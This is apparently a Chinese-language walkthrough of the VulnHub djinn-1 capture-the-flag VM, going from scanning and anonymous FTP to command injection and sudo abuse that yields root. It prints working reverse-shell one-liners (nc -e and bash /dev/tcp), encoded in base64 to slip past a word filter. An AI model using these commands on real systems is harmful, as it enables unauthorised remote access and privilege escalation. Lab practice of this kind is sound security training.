虚拟机信息:
虚拟机下载地址:https://www.vulnhub.com/entry/djinn-1,397/
虚拟机简介:None
目标:user.txt 和 root.txt
级别:中级
arp-scan 192.168.207.0/24
nmap -A -sS -sV -v -p- 192.168.207.132
查看开放21、22、1337、7331多个端口
ftp 192.168.207.132
dir
查看有三个文件
get creds.txt
get game.txt
get message.txt
查看三个文档,获取到账号密码和端口信息
发现站点打不开
提示需要回答1000次,果断放弃
nc 192.168.207.132 1337
测试7331打开正常
使用gobuster进行爆破,发现有2个目录
gobuster dir -u http://192.168.207.132:7331 -w /usr/share/wordlists/dirb/big.txt
测试第一个页面显示403
测试第二个页面,测试输入id
测试可以执行命令,返回当前权限为www-data
攻击机上开启监听
nc -lnvp 5555
生成反弹shell,提示错误的词
nc -e /bin/sh 192.168.207.130 5555
首先进行base64编码,进行测试未成功
echo "nc -e /bin/sh 192.168.207.130 5555" |base64
echo bmMgLWUgL2Jpbi9zaCAxOTIuMTY4LjIwNy4xMzAgNTU1NQo= | base64 -d | bash
echo "bash -i >& /dev/tcp/192.168.207.130/5555 0>&1" | base64
组合成功内容
echo YmFzaCAtaSA+JiAvZGV2L3RjcC8xOTIuMTY4LjIwNy4xMzAvNTU1NSAwPiYxCg== | base64 -d | bash
获取到shell权限
查看本地目录中app.py文件,存在creds.txt文件
cat /home/nitish/.dev/creds.txt
获取到普通账号和密码权限
python -c 'import pty;pty.spawn("/bin/sh")'
切换到普通账号
su - nitish
cat user.txt
查看可以使用sam权限执行genie权限
sudo -l
查看genie的使用方式,可以使用-cmd参数执行命令
sudo -u sam genie -cmd id
sudo -l
sudo -u root /root/lago
需要第一次选择2,并且输入的时候选择num才能成功
cd /root
sh proof.sh